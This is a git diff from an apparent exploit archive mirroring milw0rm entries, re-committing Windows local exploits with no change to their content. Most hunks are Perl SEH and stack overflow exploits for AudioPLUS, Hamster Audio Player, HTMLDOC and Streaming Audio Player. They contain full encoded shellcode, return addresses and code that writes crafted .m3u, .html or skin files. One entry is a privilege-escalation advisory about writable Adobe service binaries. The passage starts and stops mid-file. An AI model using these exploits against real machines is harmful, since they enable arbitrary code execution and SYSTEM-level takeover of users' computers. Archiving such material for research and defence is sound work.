+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> GUEST.ICP');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/windows/local/9152.pl b/platforms/windows/local/9152.pl
index 343455e6a..e1a7daeef 100755
--- a/platforms/windows/local/9152.pl
+++ b/platforms/windows/local/9152.pl
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit
-# first exploiter hack4love http://www.milw0rm.com/exploits/9064
-# and this the universal for .lst .m3u extention
-# Big Thnx to his0ka my best freind :d
-# Stack
-print "AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit\n";
-my $shellcode=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-my $payload = "Ma".
- "\x41" x (4099-length($shellcode)).
- "$shellcode".
- "\xE8\xF8\xEF\xFF\xFF".
- "\x41" x 10 .
- "\xEB\xEF\xFF\xFF".
- "\xA4\x29\x40\x00"; #univ ret
-print $payload;
-# usage perl exploit.pl >>exploit.m3u
-
-# milw0rm.com [2009-07-15]
+#!/usr/bin/perl
+# AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit
+# first exploiter hack4love http://www.milw0rm.com/exploits/9064
+# and this the universal for .lst .m3u extention
+# Big Thnx to his0ka my best freind :d
+# Stack
+print "AudioPLUS 2.00.215 (.m3u .lst ) Universal Seh Overwrite Exploit\n";
+my $shellcode=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+my $payload = "Ma".
+ "\x41" x (4099-length($shellcode)).
+ "$shellcode".
+ "\xE8\xF8\xEF\xFF\xFF".
+ "\x41" x 10 .
+ "\xEB\xEF\xFF\xFF".
+ "\xA4\x29\x40\x00"; #univ ret
+print $payload;
+# usage perl exploit.pl >>exploit.m3u
+
+# milw0rm.com [2009-07-15]
diff --git a/platforms/windows/local/9172.pl b/platforms/windows/local/9172.pl
index 7a7784105..f58b03972 100755
--- a/platforms/windows/local/9172.pl
+++ b/platforms/windows/local/9172.pl
@@ -1,39 +1,39 @@
-#!/usr/bin/perl
-#[+] Bug : Hamster Audio Player 0.3a Universal BOF Exploit (SEH)
-#[+] Author : ThE g0bL!N
-#[+] Greetz to all my friends
-#[+] Tested on: Windows XP Pro SP2 (Fr)
-##[+] Big thnx: His0k4
-##########################################################
-# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-my $junk="\x41" x (4103-length($shellcode));
-my $jmp="\xE9\xF4\xEF\xFF\xFF";
-my $next_seh="\xEB\xF9\x41\x42";
-my $seh="\x0F\x39\x42\x00";
-open(myfile,'>>exploit.m3u');#/hpl
-print myfile $shellcode.$junk.$jmp.$next_seh.$seh;
-
-# milw0rm.com [2009-07-16]
+#!/usr/bin/perl
+#[+] Bug : Hamster Audio Player 0.3a Universal BOF Exploit (SEH)
+#[+] Author : ThE g0bL!N
+#[+] Greetz to all my friends
+#[+] Tested on: Windows XP Pro SP2 (Fr)
+##[+] Big thnx: His0k4
+##########################################################
+# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39". +"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46". +"\x4e\x46\x43\x36\x42\x50\x5a"; +my $junk="\x41" x (4103-length($shellcode)); +my $jmp="\xE9\xF4\xEF\xFF\xFF"; +my $next_seh="\xEB\xF9\x41\x42"; +my $seh="\x0F\x39\x42\x00"; +open(myfile,'>>exploit.m3u');#/hpl +print myfile $shellcode.$junk.$jmp.$next_seh.$seh; + +# milw0rm.com [2009-07-16] diff --git a/platforms/windows/local/918.c b/platforms/windows/local/918.c index 61f941e59..bc9e9e863 100755 --- a/platforms/windows/local/918.c +++ b/platforms/windows/local/918.c @@ -145,6 +145,6 @@ int main() printf("Ftp Password : %s\n",FtpPassword); return 0; -} - -// milw0rm.com [2005-04-06] +} + +// milw0rm.com [2005-04-06] diff --git a/platforms/windows/local/919.c b/platforms/windows/local/919.c index bfa940591..c94775c93 100755 --- a/platforms/windows/local/919.c +++ b/platforms/windows/local/919.c @@ -75,6 +75,6 @@ FileFinder\\GnutellaServer", } return 0; -} - -// milw0rm.com [2005-04-07] +} + +// milw0rm.com [2005-04-07] diff --git a/platforms/windows/local/9190.pl b/platforms/windows/local/9190.pl index 610058038..0b4d8785d 100755 --- a/platforms/windows/local/9190.pl +++ b/platforms/windows/local/9190.pl 
@@ -1,52 +1,52 @@
-#!/usr/bin/perl
-# htmldoc 1.8.27.1 (.html) Universal Stack Overflow Exploit
-# http://en.securitylab.ru/poc/extra/382563.php >> Bufferoverflow POC
-# By ksa04
-# j-7[at]hotmail[dot]com
-# From Kingdom of Saudi Arabia
-#[+]--------------------------------------------------------------------------------------[+]#
-# program : HTMLDOC
-# version : all versions (tested 1.8.27.1 and 1.8.27 and 1.8.24)
-# website program : http://www.htmldoc.org
-# Download : http://www.easysw.com/htmldoc/software.php
-# Tested Under Windows XP SP3
-# NOTE : launching from directory >> htmldoc -f lol.pdf exploit.html
-# or launching HTMLDOC.exe >> add file >> Document type (wEb page or continuous) >>
-# put any thing in Output >> Generate
-#[+]--------------------------------------------------------------------------------------[+]#
-# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-my $shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
-"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
-"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
-"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
-"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
-"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
-"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
-"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
-"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
-"\x4e\x46\x43\x36\x42\x50\x5a";
-$payload = "\n";
-open(vuln,'>>exploit.html');
-print vuln $payload;
-print "[+] Done !! [+]";
-close(vuln);
-
-# milw0rm.com [2009-07-17]
+#!/usr/bin/perl
+# htmldoc 1.8.27.1 (.html) Universal Stack Overflow Exploit
+# http://en.securitylab.ru/poc/extra/382563.php >> Bufferoverflow POC
+# By ksa04
+# j-7[at]hotmail[dot]com
+# From Kingdom of Saudi Arabia
+#[+]--------------------------------------------------------------------------------------[+]#
+# program : HTMLDOC
+# version : all versions (tested 1.8.27.1 and 1.8.27 and 1.8.24)
+# website program : http://www.htmldoc.org
+# Download : http://www.easysw.com/htmldoc/software.php
+# Tested Under Windows XP SP3
+# NOTE : launching from directory >> htmldoc -f lol.pdf exploit.html
+# or launching HTMLDOC.exe >> add file >> Document type (wEb page or continuous) >>
+# put any thing in Output >> Generate
+#[+]--------------------------------------------------------------------------------------[+]#
+# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+my $shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
+"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
+"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
+"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
+"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
+"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
+"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
+"\x4e\x46\x43\x36\x42\x50\x5a";
+$payload = "\n";
+open(vuln,'>>exploit.html');
+print vuln $payload;
+print "[+] Done !! [+]";
+close(vuln);
+
+# milw0rm.com [2009-07-17]
diff --git a/platforms/windows/local/9199.txt b/platforms/windows/local/9199.txt
index a599a0f2c..930bd6440 100755
--- a/platforms/windows/local/9199.txt
+++ b/platforms/windows/local/9199.txt
@@ -1,36 +1,36 @@
-Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
-by Nine:Situations:Group
-site: http://retrogod.altervista.org/
-
-description:
-Adobe downloader used to download updates for Adobe applications.
-Shipped with Acrobat Reader 9.x
-
-vendor: Nos Microsystems
-
-poc:
-
-C:\>sc qc "getPlus(R) Helper"
-[SC] GetServiceConfig SUCCESS
-
-SERVICE_NAME: getPlus(R) Helper
- TYPE : 110 WIN32_OWN_PROCESS (interactive)
- START_TYPE : 3 DEMAND_START
- ERROR_CONTROL : 1 NORMAL
- BINARY_PATH_NAME : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
- LOAD_ORDER_GROUP :
- TAG : 0
- DISPLAY_NAME : getPlus(R) Helper
- DEPENDENCIES : RPCSS
- SERVICE_START_NAME : LocalSystem
-
-C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
-C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!]
- NT AUTHORITY\SYSTEM:F
-
-The executable file is installed with improper permissions, with "full
-control" for Builtin Users; a simple user can replace it with a binary of
-choice.
-At the next reboot it will run with SYSTEM privileges.
-
-# milw0rm.com [2009-07-20]
+Adobe related service (getPlus_HelperSvc.exe) local elevation of privileges
+by Nine:Situations:Group
+site: http://retrogod.altervista.org/
+
+description:
+Adobe downloader used to download updates for Adobe applications.
+Shipped with Acrobat Reader 9.x
+
+vendor: Nos Microsystems
+
+poc:
+
+C:\>sc qc "getPlus(R) Helper"
+[SC] GetServiceConfig SUCCESS
+
+SERVICE_NAME: getPlus(R) Helper
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 3 DEMAND_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Programmi\NOS\bin\getPlus_HelperSvc.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : getPlus(R) Helper
+ DEPENDENCIES : RPCSS
+ SERVICE_START_NAME : LocalSystem
+
+C:\>cacls "C:\Programmi\NOS\bin\getPlus_HelperSvc.exe"
+C:\Programmi\NOS\bin\getPlus_HelperSvc.exe BUILTIN\Users:F <-------------- [!!!]
+ NT AUTHORITY\SYSTEM:F + +The executable file is installed with improper permissions, with "full +control" for Builtin Users; a simple user can replace it with a binary of +choice. +At the next reboot it will run with SYSTEM privileges. + +# milw0rm.com [2009-07-20] diff --git a/platforms/windows/local/920.c b/platforms/windows/local/920.c index 77886e36c..db31db513 100755 --- a/platforms/windows/local/920.c +++ b/platforms/windows/local/920.c @@ -55,6 +55,6 @@ int main(void) } return 0; -} - -// milw0rm.com [2005-04-07] +} + +// milw0rm.com [2005-04-07] diff --git a/platforms/windows/local/9215.pl b/platforms/windows/local/9215.pl index 7d4d34095..20b40548c 100755 --- a/platforms/windows/local/9215.pl +++ b/platforms/windows/local/9215.pl 
@@ -1,49 +1,49 @@ -# *+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.* -# }{ SkuLL-HacKeR }{ -# *+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.* - -#!/usr/bin/perl -#[+] Streaming Audio Player 0.9 (skin) Local Stack Overflow (SEH) -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". -"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37". -"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48". -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48". -"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43". -"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a". -"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b". -"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37". -"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49". -"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46". 
-"\x4e\x36\x43\x46\x42\x50\x5a"; -my $junk = "\x41" x 236; -my $nseh = "\xEB\x06\x90\x90"; -my $seh = "\xB8\x15\xD1\x72"; -my $junk2 = "\x90" x 2000; -open(myfile,'>>UI.TXT'); -print myfile $junk.$nseh.$seh.$shellcode.$junk2; - -# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # - - # Author : SkuLL-HacKeR - # Home : www.Skull-hackeR.NeT - # GreetZ : PrOF.SELLiM , ThE X-HaCkEr , Amine-vb # : Str0ke - # Contact : SkuLL--HacKeR@HotmaiL.CoM - -# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # -# END.. -# ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * ° * - -# milw0rm.com [2009-07-20] +# *+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.* +# }{ SkuLL-HacKeR }{ +# *+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.*+°.* + +#!/usr/bin/perl +#[+] Streaming Audio Player 0.9 (skin) Local Stack Overflow (SEH) +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". +"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37". +"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48". +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e". 